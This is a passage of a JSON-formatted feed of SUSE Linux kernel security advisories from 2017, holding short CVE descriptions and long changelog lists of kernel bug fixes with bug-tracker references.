Also check for NOTPRESENT in\n fc_remote_port_add() (bsc#1037890).\n - scsi: scsi_transport_fc: set scsi_target_id upon rescan (bsc#1058135).\n - scsi: sd: Do not override max_sectors_kb sysfs setting (bsc#1025461).\n - scsi: sd: Remove LBPRZ dependency for discards (bsc#1060985). This patch\n is originally part of a larger series which can't be easily backported\n to SLE-12. For a reasoning why we think it's safe to apply, see\n bsc#1060985, comment 20.\n - scsi: sg: close race condition in sg_remove_sfp_usercontext()\n (bsc#1064206).\n - scsi: sg: do not return bogus Sg_requests (bsc#1064206).\n - scsi: sg: factor out sg_fill_request_table() (bnc#1012382).\n - scsi: sg: fixup infoleak when using SG_GET_REQUEST_TABLE (bnc#1012382).\n - scsi: sg: off by one in sg_ioctl() (bnc#1012382).\n - scsi: sg: only check for dxfer_len greater than 256M (bsc#1064206).\n - scsi: sg: remove 'save_scat_len' (bnc#1012382).\n - scsi: sg: use standard lists for sg_requests (bnc#1012382).\n - scsi: storvsc: fix memory leak on ring buffer busy (bnc#1012382).\n - scsi_transport_fc: Also check for NOTPRESENT in fc_remote_port_add()\n (bsc#1037890).\n - scsi: zfcp: add handling for FCP_RESID_OVER to the fcp ingress path\n (bnc#1012382).\n - scsi: zfcp: fix capping of unsuccessful GPN_FT SAN response trace\n records (bnc#1012382).\n - scsi: zfcp: fix missing trace records for early returns in TMF eh\n handlers (bnc#1012382).\n - scsi: zfcp: fix passing fsf_req to SCSI trace on TMF to correlate with\n HBA (bnc#1012382).\n - scsi: zfcp: fix payload with full FCP_RSP IU in SCSI trace records\n (bnc#1012382).\n - scsi: zfcp: fix queuecommand for scsi_eh commands when DIX enabled\n (bnc#1012382).\n - scsi: zfcp: trace HBA FSF response by default on dismiss or timedout\n late response (bnc#1012382).\n - scsi: zfcp: trace high part of "new" 64 bit SCSI LUN (bnc#1012382).\n - seccomp: fix the usage of get/put_seccomp_filter() in\n seccomp_get_filter() (bnc#1012382).\n - sh_eth: use correct name for ECMR_MPDE bit (bnc#1012382).\n - skd: Avoid that module unloading triggers a use-after-free (bnc#1012382).\n - skd: Submit requests to firmware before triggering the doorbell\n (bnc#1012382).\n - SMB3: Do not ignore O_SYNC/O_DSYNC and O_DIRECT flags (bnc#1012382).\n - SMB: Validate negotiate (to protect against downgrade) even if signing\n off (bnc#1012382).\n - staging: iio: ad7192: Fix - use the dedicated reset function avoiding\n dma from stack (bnc#1012382).\n - stm class: Fix a use-after-free (bnc#1012382).\n - supported.conf: clear mistaken external support flag for cifs.ko\n (bsc#1053802).\n - supported.conf: enable dw_mmc-rockchip driver References: bsc#1064064\n - swiotlb-xen: implement xen_swiotlb_dma_mmap callback (bnc#1012382).\n - sysctl: fix lax sysctl_check_table() sanity check (bsc#1048893).\n - sysctl: fold sysctl_writes_strict checks into helper (bsc#1048893).\n - sysctl: kdoc'ify sysctl_writes_strict (bsc#1048893).\n - sysctl: simplify unsigned int support (bsc#1048893).\n - team: call netdev_change_features out of team lock (bsc#1055567).\n - team: fix memory leaks (bnc#1012382).\n - timer/sysclt: Restrict timer migration sysctl values to 0 and 1\n (bnc#1012382).\n - tpm: fix: return rc when devm_add_action() fails (bsc#1020645,\n fate#321435, fate#321507, fate#321600, bsc#1034048, git-fixes\n 8e0ee3c9faed).\n - tpm: read burstcount from TPM_STS in one 32-bit transaction\n (bsc#1020645, fate#321435, fate#321507, fate#321600, bsc#1034048,\n git-fixes 27084efee0c3).\n - tpm_tis_core: Choose appropriate timeout for reading burstcount\n (bsc#1020645, fate#321435, fate#321507, fate#321600, bsc#1034048,\n git-fixes aec04cbdf723).\n - tpm_tis_core: convert max timeouts from msec to jiffies (bsc#1020645,\n fate#321435, fate#321507, fate#321600, bsc#1034048, git-fixes\n aec04cbdf723).\n - tracing: Apply trace_clock changes to instance max buffer (bnc#1012382).\n - tracing: Erase irqsoff trace with empty write (bnc#1012382).\n - tracing: Fix trace_pipe behavior for instance traces (bnc#1012382).\n - ttpci: address stringop overflow warning (bnc#1012382).\n - tty: fix __tty_insert_flip_char regression (bnc#1012382).\n - tty: goldfish: Fix a parameter of a call to free_irq (bnc#1012382).\n - tty: improve tty_insert_flip_char() fast path (bnc#1012382).\n - tty: improve tty_insert_flip_char() slow path (bnc#1012382).\n - tty: pl011: fix initialization order of QDF2400 E44 (bsc#1054082).\n - tty: serial: msm: Support more bauds (git-fixes).\n - ubifs: Correctly evict xattr inodes (bsc#1012829).\n - ubifs: Do not leak kernel memory to the MTD (bsc#1012829).\n - Update patches.drivers/0029-perf-xgene-Remove-bogus-IS_ERR-check.patch\n (bsc#1036737).\n - Update\n patches.drivers/tpm-141-fix-RC-value-check-in-tpm2_seal_trusted.patch\n (bsc#1020645, fate#321435, fate#321507, fate#321600, bsc#1034048,\n git-fixes 5ca4c20cfd37).\n - usb: chipidea: vbus event may exist before starting gadget (bnc#1012382).\n - usb: core: fix device node leak (bsc#1047487).\n - usb: core: harden cdc_parse_cdc_header (bnc#1012382).\n - usb: devio: Do not corrupt user memory (bnc#1012382).\n - usb: dummy-hcd: fix connection failures (wrong speed) (bnc#1012382).\n - usb: dummy-hcd: Fix erroneous synchronization change (bnc#1012382).\n - usb: dummy-hcd: fix infinite-loop resubmission bug (bnc#1012382).\n - usb: fix out-of-bounds in usb_set_configuration (bnc#1012382).\n - usb: gadgetfs: fix copy_to_user while holding spinlock (bnc#1012382).\n - usb: gadgetfs: Fix crash caused by inadequate synchronization\n (bnc#1012382).\n - usb: gadget: inode.c: fix unbalanced spin_lock in ep0_write\n (bnc#1012382).\n - usb: gadget: mass_storage: set msg_registered after msg registered\n (bnc#1012382).\n - usb: gadget: udc: atmel: set vbus irqflags explicitly (bnc#1012382).\n - usb: g_mass_storage: Fix deadlock when driver is unbound (bnc#1012382).\n - usb: Increase quirk delay for USB devices (bnc#1012382).\n - usb: pci-quirks.c: Corrected timeout values used in handshake\n (bnc#1012382).\n - usb: plusb: Add support for PL-27A1 (bnc#1012382).\n - usb: renesas_usbhs: fix the BCLR setting condition for non-DCP pipe\n (bnc#1012382).\n - usb: renesas_usbhs: fix usbhsf_fifo_clear() for RX direction\n (bnc#1012382).\n - usb: serial: mos7720: fix control-message error handling (bnc#1012382).\n - usb: serial: mos7840: fix control-message error handling (bnc#1012382).\n - usb-storage: unusual_devs entry to fix write-access regression for\n Seagate external drives (bnc#1012382).\n - usb: uas: fix bug in handling of alternate settings (bnc#1012382).\n - uwb: ensure that endpoint is interrupt (bnc#1012382).\n - uwb: properly check kthread_run return value (bnc#1012382).\n - vfs: Return -ENXIO for negative SEEK_HOLE / SEEK_DATA offsets\n (bnc#1012382).\n - video: fbdev: aty: do not leak uninitialized padding in clk to userspace\n (bnc#1012382).\n - Workaround for kABI compatibility with DP-MST patches (bsc#1055493).\n - x86/acpi: Restore the order of CPU IDs (bnc#1056230).\n - x86/cpu/amd: Hide unused legacy_fixup_core_id() function (bsc#1060229).\n - x86/cpu/amd: Limit cpu_core_id fixup to families older than F17h\n (bsc#1060229).\n - x86/cpu: Remove unused and undefined __generic_processor_info()\n declaration (bnc#1056230).\n - x86 edac, sb_edac.c: Take account of channel hashing when needed\n (bsc#1061721).\n - x86/fpu: Do not let userspace set bogus xcomp_bv (bnc#1012382).\n - x86/fsgsbase/64: Report FSBASE and GSBASE correctly in core dumps\n (bnc#1012382).\n - x86/ldt: Fix off by one in get_segment_base() (bsc#1061872).\n - x86/mm: Fix boot crash caused by incorrect loop count calculation in\n sync_global_pgds() (bsc#1058512).\n - x86/mm: Fix fault error path using unsafe vma pointer (fate#321300).\n - x86/mm: Fix use-after-free of ldt_struct (bsc#1055963).\n - x86/mshyperv: Remove excess #includes from mshyperv.h (fate#320485).\n - xfs/dmapi: fix incorrect file->f_path.dentry->d_inode usage\n (bsc#1055896).\n - xfs: fix inobt inode allocation search optimization (bsc#1012829).\n - xfs: handle error if xfs_btree_get_bufs fails (bsc#1059863).\n - xfs: nowait aio support (FATE#321994).\n - xfs: remove kmem_zalloc_greedy (bnc#1012382).\n - xgene: Always get clk source, but ignore if it's missing for SGMII ports\n (bsc#1048501).\n - xgene: Do not fail probe, if there is no clk resource for SGMII\n interfaces (bsc#1048501).\n - xhci: fix finding correct bus_state structure for USB 3.1 hosts\n (bnc#1012382).\n\n", "edition": 1, "modified": "2017-10-25T15:17:56", "published": "2017-10-25T15:17:56", "href": "http://lists.opensuse.org/opensuse-security-announce/2017-10/msg00073.html", "id": "SUSE-SU-2017:2847-1", "type": "suse", "title": "Security update for the Linux Kernel (important)", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-12-12T19:01:14", "bulletinFamily": "unix", "cvelist": ["CVE-2017-13080", "CVE-2017-14489", "CVE-2017-15265", "CVE-2017-15649", "CVE-2017-12153", "CVE-2017-6346"], "description": "The SUSE Linux Enterprise 12 SP2 Realtime kernel was updated to 4.4.95 to\n receive various security and bugfixes.\n\n\n The following security bugs were fixed:\n\n - CVE-2017-12153: A security flaw was discovered in the\n nl80211_set_rekey_data() function in net/wireless/nl80211.c in the Linux\n kernel This function did not check whether the required attributes are\n present in a Netlink request. This request can be issued by a user with\n the CAP_NET_ADMIN capability and may result in a NULL pointer\n dereference and system crash (bnc#1058410 1058624).\n - CVE-2017-13080: Wi-Fi Protected Access (WPA and WPA2) allowed\n reinstallation of the Group Temporal Key (GTK) during the group key\n handshake, allowing an attacker within radio range to replay frames from\n access points to clients (bnc#1063667).\n - CVE-2017-14489: The iscsi_if_rx function in\n drivers/scsi/scsi_transport_iscsi.c in the Linux kernel allowed local\n users to cause a denial of service (panic) by leveraging incorrect\n length validation (bnc#1059051).\n - CVE-2017-15265: Race condition in the ALSA subsystem in the Linux kernel\n allowed local users to cause a denial of service (use-after-free) or\n possibly have unspecified other impact via crafted /dev/snd/seq ioctl\n calls, related to sound/core/seq/seq_clientmgr.c and\n sound/core/seq/seq_ports.c (bnc#1062520).\n - CVE-2017-15649: net/packet/af_packet.c in the Linux kernel allowed local\n users to gain privileges via crafted system calls that trigger\n mishandling of packet_fanout data structures, because of a race\n condition (involving fanout_add and packet_do_bind) that leads to a\n use-after-free, a different vulnerability than CVE-2017-6346\n (bnc#1064388).\n\n The following non-security bugs were fixed:\n\n - alsa: au88x0: avoid theoretical uninitialized access (bnc#1012382).\n - alsa: caiaq: Fix stray URB at probe error path (bnc#1012382).\n - alsa: compress: Remove unused variable (bnc#1012382).\n - alsa: hda: Remove superfluous '-' added by printk conversion\n (bnc#1012382).\n - alsa: line6: Fix leftover URB at error-path during probe (bnc#1012382).\n - alsa: seq: Enable 'use' locking in all configurations (bnc#1012382).\n - alsa: seq: Fix copy_from_user() call inside lock (bnc#1012382).\n - alsa: usb-audio: Add native DSD support for Pro-Ject Pre Box S2 Digital\n (bnc#1012382).\n - alsa: usb-audio: Check out-of-bounds access by corrupted buffer\n descriptor (bnc#1012382).\n - alsa: usb-audio: Kill stray URB at exiting (bnc#1012382).\n - alsa: usx2y: Suppress kernel warning at page allocation failures\n (bnc#1012382).\n - arc: Re-enable MMU upon Machine Check exception (bnc#1012382).\n - arm64: fault: Route pte translation faults via do_translation_fault\n (bnc#1012382).\n - arm64: Make sure SPsel is always set (bnc#1012382).\n - arm: 8635/1: nommu: allow enabling REMAP_VECTORS_TO_RAM (bnc#1012382).\n - arm: dts: r8a7790: Use R-Car Gen 2 fallback binding for msiof nodes\n (bnc#1012382).\n - arm: pxa: add the number of DMA requestor lines (bnc#1012382).\n - arm: pxa: fix the number of DMA requestor lines (bnc#1012382).\n - arm: remove duplicate 'const' annotations' (bnc#1012382).\n - asoc: dapm: fix some pointer error handling (bnc#1012382).\n - asoc: dapm: handle probe deferrals (bnc#1012382).\n - audit: log 32-bit socketcalls (bnc#1012382).\n - bcache: correct cache_dirty_target in __update_writeback_rate()\n (bnc#1012382).\n - bcache: Correct return value for sysfs attach errors (bnc#1012382).\n - bcache: do not subtract sectors_to_gc for bypassed IO (bnc#1012382).\n - bcache: fix bch_hprint crash and improve output (bnc#1012382).\n - bcache: fix for gc and write-back race (bnc#1012382).\n - bcache: Fix leak of bdev reference (bnc#1012382).\n - bcache: initialize dirty stripes in flash_dev_run() (bnc#1012382).\n - blacklist.conf: blacklisted 16af97dc5a89 (bnc#1053919)\n - block: Relax a check in blk_start_queue() (bnc#1012382).\n - bpf: one perf event close won't free bpf program attached by another\n perf event (bnc#1012382).\n - bpf/verifier: reject BPF_ALU64|BPF_END (bnc#1012382).\n - brcmfmac: add length check in brcmf_cfg80211_escan_handler()\n (bnc#1012382).\n - brcmfmac: setup passive scan if requested by user-space (bnc#1012382).\n - brcmsmac: make some local variables 'static const' to reduce stack size\n (bnc#1012382).\n - bridge: netlink: register netdevice before executing changelink\n (bnc#1012382).\n - bsg-lib: do not free job in bsg_prepare_job (bnc#1012382).\n - btrfs: add a node counter to each of the rbtrees (bsc#974590 bsc#1030061\n bsc#1022914 bsc#1017461).\n - btrfs: add cond_resched() calls when resolving backrefs (bsc#974590\n bsc#1030061 bsc#1022914 bsc#1017461).\n - btrfs: allow backref search checks for shared extents (bsc#974590\n bsc#1030061 bsc#1022914 bsc#1017461).\n - btrfs: backref, add tracepoints for prelim_ref insertion and merging\n (bsc#974590 bsc#1030061 bsc#1022914 bsc#1017461).\n - btrfs: backref, add unode_aux_to_inode_list helper (bsc#974590\n bsc#1030061 bsc#1022914 bsc#1017461).\n - btrfs: backref, cleanup __ namespace abuse (bsc#974590 bsc#1030061\n bsc#1022914 bsc#1017461).\n - btrfs: backref, constify some arguments (bsc#974590 bsc#1030061\n bsc#1022914 bsc#1017461).\n - btrfs: btrfs_check_shared should manage its own transaction (bsc#974590\n bsc#1030061 bsc#1022914 bsc#1017461).\n - btrfs: change how we decide to commit transactions during flushing\n (bsc#1060197).\n - btrfs: clean up extraneous computations in add_delayed_refs (bsc#974590\n bsc#1030061 bsc#1022914 bsc#1017461).\n - btrfs: constify tracepoint arguments (bsc#974590 bsc#1030061 bsc#1022914\n bsc#1017461).\n - btrfs: convert prelimary reference tracking to use rbtrees (bsc#974590\n bsc#1030061 bsc#1022914 bsc#1017461).\n - btrfs: fix leak and use-after-free in resolve_indirect_refs (bsc#974590\n bsc#1030061 bsc#1022914 bsc#1017461).\n - btrfs: fix NULL pointer dereference from free_reloc_roots()\n (bnc#1012382).\n - btrfs: prevent to set invalid default subvolid (bnc#1012382).\n - btrfs: propagate error to btrfs_cmp_data_prepare caller (bnc#1012382).\n - btrfs: qgroup: move noisy underflow warning to debugging build\n (bsc#1055755).\n - btrfs: remove ref_tree implementation from backref.c (bsc#974590\n bsc#1030061 bsc#1022914 bsc#1017461).\n - btrfs: struct-funcs, constify readers (bsc#974590 bsc#1030061\n bsc#1022914 bsc#1017461).\n - bus: mbus: fix window size calculation for 4GB windows (bnc#1012382).\n - can: esd_usb2: Fix can_dlc value for received RTR, frames (bnc#1012382).\n - can: gs_usb: fix busy loop if no more TX context is available\n (bnc#1012382).\n - ceph: avoid panic in create_session_open_msg() if utsname() returns NULL\n (bsc#1061451).\n - ceph: check negative offsets in ceph_llseek() (bsc#1061451).\n - ceph: clean up unsafe d_parent accesses in build_dentry_path\n (bnc#1012382).\n - cifs: fix circular locking dependency (bsc#1064701).\n - cifs: Fix SMB3.1.1 guest authentication to Samba (bnc#1012382).\n - cifs: Reconnect expired SMB sessions (bnc#1012382).\n - cifs: release auth_key.response for reconnect (bnc#1012382).\n - clockevents/drivers/cs5535: Improve resilience to spurious interrupts\n (bnc#1012382).\n - cpufreq: CPPC: add ACPI_PROCESSOR dependency (bnc#1012382).\n - crypto: AF_ALG - remove SGL terminator indicator when chaining\n (bnc#1012382).\n - crypto: shash - Fix zero-length shash ahash digest crash (bnc#1012382).\n - crypto: talitos - Do not provide setkey for non hmac hashing algs\n (bnc#1012382).\n - crypto: talitos - fix sha224 (bnc#1012382).\n - crypto: xts - Add ECB dependency (bnc#1012382).\n - cxl: Fix driver use count (bnc#1012382).\n - direct-io: Prevent NULL pointer access in submit_page_section\n (bnc#1012382).\n - dmaengine: edma: Align the memcpy acnt array size with the transfer\n (bnc#1012382).\n - dmaengine: mmp-pdma: add number of requestors (bnc#1012382).\n - driver core: platform: Do not read past the end of "driver_override"\n buffer (bnc#1012382).\n - drivers: firmware: psci: drop duplicate const from psci_of_match\n (bnc#1012382).\n - drivers: hv: fcopy: restore correct transfer length (bnc#1012382).\n - drm: Add driver-private objects to atomic state (bsc#1055493).\n - drm/amdkfd: fix improper return value on error (bnc#1012382).\n - drm: bridge: add DT bindings for TI ths8135 (bnc#1012382).\n - drm/dp: Introduce MST topology state to track available link bandwidth\n (bsc#1055493).\n - drm_fourcc: Fix DRM_FORMAT_MOD_LINEAR #define (bnc#1012382).\n - drm/i915/bios: ignore HDMI on port A (bnc#1012382).\n - drm/nouveau/bsp/g92: disable by default (bnc#1012382).\n - drm/nouveau/mmu: flush tlbs before deleting page tables (bnc#1012382).\n - ext4: do not allow encrypted operations without keys (bnc#1012382).\n - ext4: fix incorrect quotaoff if the quota feature is enabled\n (bnc#1012382).\n - ext4: fix quota inconsistency during orphan cleanup for read-only mounts\n (bnc#1012382).\n - ext4: in ext4_seek_{hole,data}, return -ENXIO for negative offsets\n (bnc#1012382).\n - extcon: axp288: Use vbus-valid instead of -present to determine cable\n presence (bnc#1012382).\n - exynos-gsc: Do not swap cb/cr for semi planar formats (bnc#1012382).\n - f2fs: check hot_data for roll-forward recovery (bnc#1012382).\n - f2fs crypto: add missing locking for keyring_key access (bnc#1012382).\n - f2fs crypto: replace some BUG_ON()'s with error checks (bnc#1012382).\n - f2fs: do not wait for writeback in write_begin (bnc#1012382).\n - fix unbalanced page refcounting in bio_map_user_iov (bnc#1012382).\n - fix whitespace according to upstream commit\n - fix xen_swiotlb_dma_mmap prototype (bnc#1012382).\n - fs-cache: fix dereference of NULL user_key_payload (bnc#1012382).\n - fscrypt: fix dereference of NULL user_key_payload (bnc#1012382).\n - fscrypto: require write access to mount to set encryption policy\n (bnc#1012382).\n - fs/epoll: cache leftmost node (bsc#1056427).\n - ftrace: Fix kmemleak in unregister_ftrace_graph (bnc#1012382).\n - ftrace: Fix memleak when unregistering dynamic ops when tracing disabled\n (bnc#1012382).\n - ftrace: Fix selftest goto location on error (bnc#1012382).\n - genirq: Fix for_each_action_of_desc() macro (bsc#1061064).\n - getcwd: Close race with d_move called by lustre (bsc#1052593).\n - gfs2: Fix debugfs glocks dump (bnc#1012382).\n - gfs2: Fix reference to ERR_PTR in gfs2_glock_iter_next (bnc#1012382).\n - gianfar: Fix Tx flow control deactivation (bnc#1012382).\n - hid: i2c-hid: allocate hid buffers for real worst case (bnc#1012382).\n - hid: usbhid: Add HID_QUIRK_NOGET for Aten CS-1758 KVM switch\n (bnc#1022967).\n - hid: usbhid: fix out-of-bounds bug (bnc#1012382).\n - hpsa: correct lun data caching bitmap definition (bsc#1028971).\n - hwmon: (gl520sm) Fix overflows and crash seen when writing into limit\n attributes (bnc#1012382).\n - i2c: at91: ensure state is restored after suspending (bnc#1012382).\n - i2c: ismt: Separate I2C block read from SMBus block read (bnc#1012382).\n - i2c: meson: fix wrong variable usage in meson_i2c_put_data (bnc#1012382).\n - i40e: Initialize 64-bit statistics TX ring seqcount (bsc#969476\n FATE#319648 bsc#969477 FATE#319816).\n - i40iw: Add missing memory barriers (bsc#969476 FATE#319648 bsc#969477\n FATE#319816).\n - i40iw: Fix port number for query QP (bsc#969476 FATE#319648 bsc#969477\n FATE#319816).\n - ib/core: Fix for core panic (bsc#1022595 FATE#322350).\n - ib/core: Fix the validations of a multicast LID in attach or detach\n operations (bsc#1022595 FATE#322350).\n - ib/i40iw: Fix error code in i40iw_create_cq() (bsc#969476 FATE#319648\n bsc#969477 FATE#319816).\n - ib/ipoib: Fix deadlock over vlan_mutex (bnc#1012382).\n - ib/ipoib: Replace list_del of the neigh->list with list_del_init\n (bnc#1012382).\n - ib/ipoib: rtnl_unlock can not come after free_netdev (bnc#1012382).\n - ib/mlx5: Fix Raw Packet QP event handler assignment (bsc#966170\n FATE#320225 bsc#966172 FATE#320226).\n - ibmvnic: Set state UP (bsc#1062962).\n - ib/qib: fix false-postive maybe-uninitialized warning (bnc#1012382).\n - igb: re-assign hw address pointer on reset after PCI error (bnc#1012382).\n - iio: ad7793: Fix the serial interface reset (bnc#1012382).\n - iio: adc: axp288: Drop bogus AXP288_ADC_TS_PIN_CTRL register\n modifications (bnc#1012382).\n - iio: adc: hx711: Add DT binding for avia,hx711 (bnc#1012382).\n - iio: adc: mcp320x: Fix oops on module unload (bnc#1012382).\n - iio: adc: mcp320x: Fix readout of negative voltages (bnc#1012382).\n - iio: adc: twl4030: Disable the vusb3v1 rugulator in the error handling\n path of 'twl4030_madc_probe()' (bnc#1012382).\n - iio: adc: twl4030: Fix an error handling path in 'twl4030_madc_probe()'\n (bnc#1012382).\n - iio: adc: xilinx: Fix error handling (bnc#1012382).\n - iio: ad_sigma_delta: Implement a dedicated reset function (bnc#1012382).\n - iio: core: Return error for failed read_reg (bnc#1012382).\n - input: i8042 - add Gigabyte P57 to the keyboard reset table\n (bnc#1012382).\n - iommu/amd: Finish TLB flush in amd_iommu_unmap() (bnc#1012382).\n - iommu/io-pgtable-arm: Check for leaf entry before dereferencing it\n (bnc#1012382).\n - iommu/vt-d: Avoid calling virt_to_phys() on null pointer (bsc#1061067).\n - ip6_gre: skb_push ipv6hdr before packing the header in ip6gre_header\n (bnc#1012382).\n - ipv6: accept 64k - 1 packet length in ip6_find_1stfragopt()\n (bnc#1012382).\n - ipv6: add rcu grace period before freeing fib6_node (bnc#1012382).\n - ipv6: fix memory leak with multiple tables during netns destruction\n (bnc#1012382).\n - ipv6: fix sparse warning on rt6i_node (bnc#1012382).\n - ipv6: fix typo in fib6_net_exit() (bnc#1012382).\n - irqchip/crossbar: Fix incorrect type of local variables (bnc#1012382).\n - isdn/i4l: fetch the ppp_write buffer in one shot (bnc#1012382).\n - iwlwifi: add workaround to disable wide channels in 5GHz (bnc#1012382).\n - iwlwifi: mvm: use IWL_HCMD_NOCOPY for MCAST_FILTER_CMD (bnc#1012382).\n - ixgbe: Fix incorrect bitwise operations of PTP Rx timestamp flags\n (bsc#969474 FATE#319812 bsc#969475 FATE#319814).\n - kABI: protect struct l2tp_tunnel (kabi).\n - kABI: protect struct rm_data_op (kabi).\n - kABI: protect struct sdio_func (kabi).\n - keys: do not let add_key() update an uninstantiated key (bnc#1012382).\n - keys: encrypted: fix dereference of NULL user_key_payload (bnc#1012382).\n - keys: Fix race between updating and finding a negative key (bnc#1012382).\n - keys: fix writing past end of user-supplied buffer in keyring_read()\n (bnc#1012382).\n - keys: prevent creating a different user's keyrings (bnc#1012382).\n - keys: prevent KEYCTL_READ on negative key (bnc#1012382).\n - kvm: async_pf: Fix #DF due to inject "Page not Present" and "Page Ready"\n exceptions simultaneously (bsc#1061017).\n - kvm: nVMX: fix guest CR4 loading when emulating L2 to L1 exit\n (bnc#1012382).\n - kvm: PPC: Book3S: Fix race and leak in kvm_vm_ioctl_create_spapr_tce()\n (bnc#1012382).\n - kvm: SVM: Add a missing 'break' statement (bsc#1061017).\n - kvm: VMX: do not change SN bit in vmx_update_pi_irte() (bsc#1061017).\n - kvm: VMX: remove WARN_ON_ONCE in kvm_vcpu_trigger_posted_interrupt\n (bsc#1061017).\n - kvm: VMX: use cmpxchg64 (bnc#1012382).\n - l2tp: Avoid schedule while atomic in exit_net (bnc#1012382).\n - l2tp: fix race condition in l2tp_tunnel_delete (bnc#1012382).\n - libata: transport: Remove circular dependency at free time (bnc#1012382).\n - lib/digsig: fix dereference of NULL user_key_payload (bnc#1012382).\n - locking/lockdep: Add nest_lock integrity test (bnc#1012382).\n - lsm: fix smack_inode_removexattr and xattr_getsecurity memleak\n (bnc#1012382).\n - mac80211: fix power saving clients handling in iwlwifi (bnc#1012382).\n - mac80211: flush hw_roc_start work before cancelling the ROC\n (bnc#1012382).\n - mac80211_hwsim: check HWSIM_ATTR_RADIO_NAME length (bnc#1012382).\n - md/bitmap: disable bitmap_resize for file-backed bitmaps (bsc#1061172).\n - md/linear: shutup lockdep warnning (bnc#1012382).\n - md/raid10: submit bio directly to replacement disk (bnc#1012382).\n - md/raid5: preserve STRIPE_ON_UNPLUG_LIST in break_stripe_batch_list\n (bnc#1012382).\n - md/raid5: release/flush io in raid5_do_work() (bnc#1012382).\n - media: uvcvideo: Prevent heap overflow when accessing mapped controls\n (bnc#1012382).\n - media: v4l2-compat-ioctl32: Fix timespec conversion (bnc#1012382).\n - mips: Ensure bss section ends on a long-aligned address (bnc#1012382).\n - mips: Fix minimum alignment requirement of IRQ stack (git-fixes).\n - mips: IRQ Stack: Unwind IRQ stack onto task stack (bnc#1012382).\n - mips: Lantiq: Fix another request_mem_region() return code check\n (bnc#1012382).\n - mips: math-emu: <MAXA|MINA>.<D|S>: Fix cases of both infinite inputs\n (bnc#1012382).\n - mips: math-emu: <MAXA|MINA>.<D|S>: Fix cases of input values with\n opposite signs (bnc#1012382).\n - mips: math-emu: <MAX|MAXA|MIN|MINA>.<D|S>: Fix cases of both inputs zero\n (bnc#1012382).\n - mips: math-emu: <MAX|MAXA|MIN|MINA>.<D|S>: Fix quiet NaN propagation\n (bnc#1012382).\n - mips: math-emu: <MAX|MIN>.<D|S>: Fix cases of both inputs negative\n (bnc#1012382).\n - mips: math-emu: MINA.<D|S>: Fix some cases of infinity and zero inputs\n (bnc#1012382).\n - mips: math-emu: Remove pr_err() calls from fpu_emu() (bnc#1012382).\n - mips: ralink: Fix incorrect assignment on ralink_soc (bnc#1012382).\n - mlx5: Avoid that mlx5_ib_sg_to_klms() overflows the klms array\n (bsc#966170 FATE#320225 bsc#966172 FATE#320226).\n - mm/backing-dev.c: fix an error handling path in 'cgwb_create()'\n (bnc#1063475).\n - mm,compaction: serialize waitqueue_active() checks (for real)\n (bsc#971975).\n - mmc: sdio: fix alignment issue in struct sdio_func (bnc#1012382).\n - mm: discard memblock data later (bnc#1063460).\n - mm/memblock.c: reversed logic in memblock_discard() (bnc#1063460).\n - mm: meminit: mark init_reserved_page as __meminit (bnc#1063509).\n - mm/memory_hotplug: change pfn_to_section_nr/section_nr_to_pfn macro to\n inline function (bnc#1063501).\n - mm/memory_hotplug: define find_{smallest|biggest}_section_pfn as\n unsigned long (bnc#1063520).\n - mm: prevent double decrease of nr_reserved_highatomic (bnc#1012382).\n - net: core: Prevent from dereferencing null pointer when releasing SKB\n (bnc#1012382).\n - net: emac: Fix napi poll list corruption (bnc#1012382).\n - netfilter: invoke synchronize_rcu after set the _hook_ to NULL\n (bnc#1012382).\n - netfilter: nf_ct_expect: Change __nf_ct_expect_check() return value\n (bnc#1012382).\n - netfilter: nfnl_cthelper: fix incorrect helper->expect_class_max\n (bnc#1012382).\n - net/mlx4_core: Enable 4K UAR if SRIOV module parameter is not enabled\n (bsc#966191 FATE#320230 bsc#966186 FATE#320228).\n - net/mlx4_core: Fix VF overwrite of module param which disables DMFS on\n new probed PFs (bnc#1012382).\n - net/mlx4_en: fix overflow in mlx4_en_init_timestamp() (bnc#1012382).\n - net/mlx5e: Fix wrong delay calculation for overflow check scheduling\n (bsc#966170 FATE#320225 bsc#966172 FATE#320226).\n - net/mlx5e: Schedule overflow check work to mlx5e workqueue (bsc#966170\n FATE#320225 bsc#966172 FATE#320226).\n - net/mlx5: Skip mlx5_unload_one if mlx5_load_one fails (bsc#966170\n FATE#320225 bsc#966172 FATE#320226).\n - net: mvpp2: release reference to txq_cpu[] entry after unmapping\n (bnc#1012382).\n - net/packet: check length in getsockopt() called with PACKET_HDRLEN\n (bnc#1012382).\n - net: Set sk_prot_creator when cloning sockets to the right proto\n (bnc#1012382).\n - nfsd/callback: Cleanup callback cred on shutdown (bnc#1012382).\n - nfsd: Fix general protection fault in release_lock_stateid()\n (bnc#1012382).\n - nl80211: Define policy for packet pattern attributes (bnc#1012382).\n - nvme: protect against simultaneous shutdown invocations (FATE#319965\n bnc#1012382 bsc#964944).\n - packet: only test po->has_vnet_hdr once in packet_snd (bnc#1012382).\n - parisc: Avoid trashing sr2 and sr3 in LWS code (bnc#1012382).\n - parisc: Fix double-word compare and exchange in LWS code on 32-bit\n kernels (bnc#1012382).\n - parisc: perf: Fix potential NULL pointer dereference (bnc#1012382).\n - partitions/efi: Fix integer overflow in GPT size calculation\n (bnc#1012382).\n - pci: Allow PCI express root ports to find themselves (bsc#1061046).\n - pci: fix oops when try to find Root Port for a PCI device (bsc#1061046).\n - pci: Fix race condition with driver_override (bnc#1012382).\n - pci: shpchp: Enable bridge bus mastering if MSI is enabled (bnc#1012382).\n - percpu: make this_cpu_generic_read() atomic w.r.t. interrupts\n (bnc#1012382).\n - perf/x86: Fix RDPMC vs. mm_struct tracking (bsc#1061831).\n - perf/x86: kABI Workaround for 'perf/x86: Fix RDPMC vs. mm_struct\n tracking' (bsc#1061831).\n - pkcs7: Prevent NULL pointer dereference, since sinfo is not always set\n (bnc#1012382).\n - powerpc: Fix DAR reporting when alignment handler faults (bnc#1012382).\n - powerpc/pseries: Fix parent_dn reference leak in add_dt_node()\n (bnc#1012382).\n - qed: Fix stack corruption on probe (bsc#966318 FATE#320158 bsc#966316\n FATE#320159).\n - qlge: avoid memcpy buffer overflow (bnc#1012382).\n - rcu: Allow for page faults in NMI handlers (bnc#1012382).\n - rds: ib: add error handle (bnc#1012382).\n - rds: RDMA: Fix the composite message user notification (bnc#1012382).\n - Revert "bsg-lib: do not free job in bsg_prepare_job" (bnc#1012382).\n - Revert "net: fix percpu memory leaks" (bnc#1012382).\n - Revert "net: phy: Correctly process PHY_HALTED in phy_stop_machine()"\n 